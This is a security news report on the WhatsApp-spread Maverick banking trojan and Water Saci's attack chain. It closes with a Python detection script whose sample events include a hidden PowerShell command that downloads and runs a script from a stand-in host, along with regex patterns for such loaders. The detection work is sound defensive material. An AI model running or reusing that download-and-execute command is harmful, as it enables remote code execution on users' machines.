Maverick Malware Campaign Expands: WhatsApp-Propagated Banking Trojan Linked to Coyote

Nov 12, 2025 | News


Overview

Cybersecurity researchers have drawn strong parallels between Maverick, a new WhatsApp-propagating malware strain, and Coyote, a notorious Brazilian banking trojan, suggesting both belong to the same evolving threat ecosystem.

The findings — from CyberProof, Trend Micro, and Sophos — reveal that both trojans share key characteristics:

  • Developed in .NET
  • Target Brazilian users and banks
  • Employ nearly identical code for URL monitoring and credential theft
  • Contain functionality to spread via WhatsApp Web

Maverick, attributed to a threat actor known as Water Saci, represents an advanced evolution of this lineage — merging credential-stealing and self-propagation into a fully autonomous malware-botnet model.


How the Maverick campaign works

The campaign begins with malicious ZIP archives shared through WhatsApp Web, containing a Windows shortcut (LNK) that launches a PowerShell command connecting to the attacker’s server at zapgrande[.]com.

Once executed, the infection chain unfolds as follows:

  1. LNK file execution: runs cmd.exe or PowerShell to download a loader.
  2. Defense evasion: disables Microsoft Defender Antivirus and User Account Control (UAC).
  3. Anti-analysis: checks for reverse engineering tools; terminates if detected.
  4. Payload delivery: downloads two modules — SORVEPOTEL (a propagation agent) and Maverick (the banking malware).
  5. Geo-filtering: installs Maverick only if the host’s time zone, language, and locale confirm it’s in Brazil.

CyberProof also found evidence that hotels in Brazil were targeted, showing that Water Saci may be expanding beyond banking institutions into the hospitality sector.


Technical details: SORVEPOTEL and Maverick

The SORVEPOTEL module serves as both downloader and propagator, while Maverick handles credential theft, browser hijacking, and command execution.

Maverick’s capabilities include:

  • Monitoring active browser tabs for banking URLs in Latin America.
  • Displaying fake login or phishing pages to harvest credentials.
  • Gathering system and browser data (cookies, tokens, session info).
  • Executing commands from a remote C2 server for reconnaissance and persistence.

Water Saci’s evolving attack chain

Trend Micro’s latest research shows that Water Saci has replaced its earlier .NET payloads with Visual Basic Script (VBS) and PowerShell-based loaders to increase stealth and flexibility.

New Water Saci attack chain observed

The new campaign hijacks WhatsApp Web sessions via ChromeDriver and Selenium automation, using the victim’s browser profile data to send malware-laden ZIP files to all contacts without triggering security alerts.

Updated attack sequence:

  1. User downloads and extracts a malicious ZIP file.
  2. The included Orcamento.vbs downloader (SORVEPOTEL) runs and executes tadeu.ps1 in memory.
  3. The PowerShell script takes over the victim’s WhatsApp Web session, sending ZIP files to all contacts.
  4. A fake “WhatsApp Automation v6.0” banner masks the malicious activity.
  5. The malware copies the victim’s Chrome profile data, including cookies and authentication tokens, for seamless session hijacking.

This approach gives attackers instant access to victims’ WhatsApp accounts without requiring QR codes or triggering login warnings, enabling rapid, automated propagation.

Water Saci campaign timeline

Email-based command-and-control (C2)

One of the most unusual elements of Water Saci’s framework is its email-based C2 infrastructure, using IMAP connections to terra.com[.]br accounts secured with multi-factor authentication (MFA).

Commands are retrieved directly from the attacker-controlled inbox, reducing traceability.
Supported C2 commands include:

  • System control: REBOOT, SHUTDOWN, UPDATE
  • File ops: UPLOAD, DOWNLOAD, DELETE, MOVE, RENAME
  • Execution: CMD, POWERSHELL, SCREENSHOT, TASKLIST
  • Recon: INFO, FILE_INFO, SEARCH
  • Persistence management: CREATE_FOLDER, LIST_FILES, CHECK_EMAIL

This model allows manual, stealthy control — with operators even entering MFA codes manually to maintain access.

Why WhatsApp is the perfect vector

With 148 million active users in Brazil, WhatsApp is deeply embedded in both personal and business communications.
Water Saci exploits this by:

  • Using trust in personal contacts to bypass phishing suspicion.
  • Hijacking legitimate sessions for frictionless malware propagation.
  • Delivering highly localized, Portuguese-language lures.

Trend Micro notes that this “weaponization of trusted social apps” marks a major shift in Brazilian cybercrime tactics — from spam-based delivery to peer-to-peer infection via messaging ecosystems.


Coyote connection confirmed

Multiple security firms — including Kaspersky, Sophos, and CyberProof — confirm that Maverick shares code segments, logic, and propagation functions with Coyote, an earlier .NET banking trojan also spread in Brazil.

While opinions differ on whether Maverick is a rebranded successor or a distinct strain, the consensus is clear: both belong to the same Brazilian threat ecosystem, and both exhibit identical targeting of financial institutions.

“Linking the Water Saci campaign to Coyote reveals a significant evolution in Brazil’s banking malware scene,” Trend Micro stated.
“Threat actors have transitioned from standalone payloads to leveraging legitimate browser profiles and messaging apps for stealthy, scalable propagation.”


Defensive guidance

Organizations and individuals in Brazil and Latin America should implement the following mitigations:

  • Block and monitor ZIP, LNK, VBS, and PowerShell downloads from unverified sources.
  • Restrict use of browser automation frameworks (Selenium, ChromeDriver).
  • Apply strong endpoint protection with behavioral detection for script-based malware.
  • Use MFA on WhatsApp and other social platforms where supported.
  • Educate users on WhatsApp-based social engineering and fake “automation” prompts.
  • Regularly clear browser sessions and cookies to reduce hijack risk.
  • Monitor email systems for IMAP-based command traffic or unusual authentication attempts.
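As an added example (not code from the reporting or from any of the vendors cited), the Python below scans constructed Sysmon-style process-creation events for two steps of the updated attack sequence above: a script host spawning a PowerShell download-and-execute loader (the Orcamento.vbs to tadeu.ps1 hand-off) and ChromeDriver driving Chrome on the user's live profile, which is what lets a logged-in WhatsApp Web session be reused. The event field names, file paths, user name and the c2.example host are assumptions.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry).
# Paths, the user name "ana" and the host "c2.example" are placeholders.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wscript.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'wscript.exe "C:\Users\ana\Downloads\Orcamento.vbs"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://c2.example/tadeu.ps1')\""},
    {"image": r"C:\Users\ana\AppData\Local\Temp\chromedriver.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "chromedriver.exe --port=9515"},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": r"C:\Users\ana\AppData\Local\Temp\chromedriver.exe",
     "cmdline": r'chrome.exe --user-data-dir="C:\Users\ana\AppData\Local\Google\Chrome\User Data" '
                r'--profile-directory=Default --remote-debugging-port=0'},
    # Benign control: the user opening Chrome normally from Explorer.
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "chrome.exe --profile-directory=Default"},
]

# Chrome launched on the real user-data directory rather than a throwaway automation profile.
PROFILE_RE = re.compile(r'--user-data-dir="?[^"]*\\Google\\Chrome\\User Data', re.I)
# Typical in-memory loader markers: fetch a script and evaluate it, or an encoded command.
LOADER_RE = re.compile(r"downloadstring|invoke-expression|\biex\b|-enc\w*\s", re.I)


def _name(path):
    """Basename of a Windows image path, lower-cased for comparison."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def vbs_to_powershell_loader(ev):
    """Step 2 of the chain: wscript/cscript spawning PowerShell that pulls and runs remote code."""
    return (_name(ev["parent"]) in ("wscript.exe", "cscript.exe")
            and _name(ev["image"]) == "powershell.exe"
            and bool(LOADER_RE.search(ev["cmdline"])))


def chromedriver_on_user_profile(ev):
    """Step 3: ChromeDriver driving Chrome with the user's own profile (WhatsApp Web already logged in)."""
    return (_name(ev["parent"]) == "chromedriver.exe"
            and _name(ev["image"]) == "chrome.exe"
            and bool(PROFILE_RE.search(ev["cmdline"])))


RULES = {"vbs_to_powershell_loader": vbs_to_powershell_loader,
         "chromedriver_on_user_profile": chromedriver_on_user_profile}


def scan(events):
    """Return (rule_name, cmdline) for every event that matches a rule, in event order."""
    return [(name, ev["cmdline"]) for ev in events for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for name, cmd in scan(SAMPLE_EVENTS):
        print(f"[{name}] {cmd}")
```

Both rules key on parent/child relationships rather than file names, so renaming Orcamento.vbs or tadeu.ps1 does not evade them; legitimate Selenium test runners normally use a temporary profile and will not trip the second rule.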


Source: thehackernews.com, www.trendmicro.com
